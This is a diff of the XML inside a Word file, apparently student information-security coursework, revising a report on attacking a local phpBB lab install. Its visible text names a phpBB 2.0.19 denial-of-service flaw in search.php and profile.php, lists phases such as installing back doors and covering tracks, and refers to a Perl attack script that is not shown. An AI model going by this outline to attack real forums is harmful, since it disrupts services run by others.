-        </w:rPr>
-        <w:t xml:space="preserve">DOS (Denial of Service attack), </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>phpBB 2.0.19</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> search.php and profile.php DOS Vulnerability.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc445123123"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Enumeration</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc445123124"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Penetration/Attack</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>DOS (Denial of Service Attack)</w:t>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>DOS (Denial of Service attack)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc446495299"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc446495768"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Hardening exploits</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="22"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc446495300"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc446495769"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Conclusion</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">DDOS and DOS attacks are very resource intensive. As this is the most common form of hack software and systems are been hardened to increase the difficulty of performing such an attack. Injecting SQL code to the server side language is more a challenge to carry out although it is an ideal method for retrieve </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Notes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>LAMP architecture is made up of LINUX, APACHE, MySQL database management and PHP.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">phpBB versions effected: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>phpBB_2.0.19 and below</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>Version of PHP installed - phpBB2.0.23</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Vulnerability:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>This exploit exhausts the user registration functionality of the site and performing malformed search queries.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Methods of execution:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Refer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nced in the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Appendix of this report is a Perl script to perform the method of attack discussed above</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc445123125"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Install back doors</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc445123126"/>
-      <w:r>
-        <w:t>Covering Tracks</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc445123127"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Conclusion</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Notes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>LAMP architecture is made up of LINUX, APACHE, MySQL database management and PHP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Version of PHP installed - phpBB2.0.23</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Local </w:t>
-      </w:r>
-      <w:r>
-        <w:t>WAMP server installed</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and configured. This is just a windows based version of the LAMP server</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>Local WAMP server installed and configured. This is just a windows based version of the LAMP server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2082,12 +2945,16 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc446495301"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc446495770"/>
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
         </w:rPr>
         <w:t>References</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -2127,12 +2994,24 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="27" w:name="_Toc446495302"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc446495771"/>
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
         </w:rPr>
         <w:t>Appendix</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="28"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:headerReference w:type="default" r:id="rId15"/>
@@ -2295,6 +3174,119 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="00433A75"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="7B9EE03E"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="091053F8"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="67FCC6B0"/>
@@ -2407,7 +3399,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="21503A6E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B64C11C4"/>
@@ -2547,7 +3539,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="25C0687D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A1C23AAA"/>
@@ -2659,7 +3651,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3A050D93"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FE20D18E"/>
@@ -2799,7 +3791,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BEE5602"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="89864440"/>
@@ -2939,7 +3931,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="457D12F5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F4BA2FEA"/>
@@ -3079,7 +4071,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="518239CA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B0FC6444"/>
@@ -3168,7 +4160,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="65261DA9"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9F040CBE"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="78EF40C1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F63CDFA2"/>
@@ -3309,28 +4414,34 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="4">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="8">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="5">
-    <w:abstractNumId w:val="7"/>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="7">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="8">
-    <w:abstractNumId w:val="0"/>
+  <w:num w:numId="10">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>
@@ -3772,6 +4883,28 @@
       <w:szCs w:val="26"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading3Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00FC6EDC"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40" w:after="0"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -4001,6 +5134,32 @@
       <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
       <w:u w:val="single"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
+    <w:name w:val="Heading 3 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00FC6EDC"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC3">
+    <w:name w:val="toc 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00FC6EDC"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="440"/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>
@@ -4290,7 +5449,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{357B696A-B5C7-48D0-A4E1-0432D1779C67}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BF030E76-6FC1-4155-841C-CF9C613C65B9}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
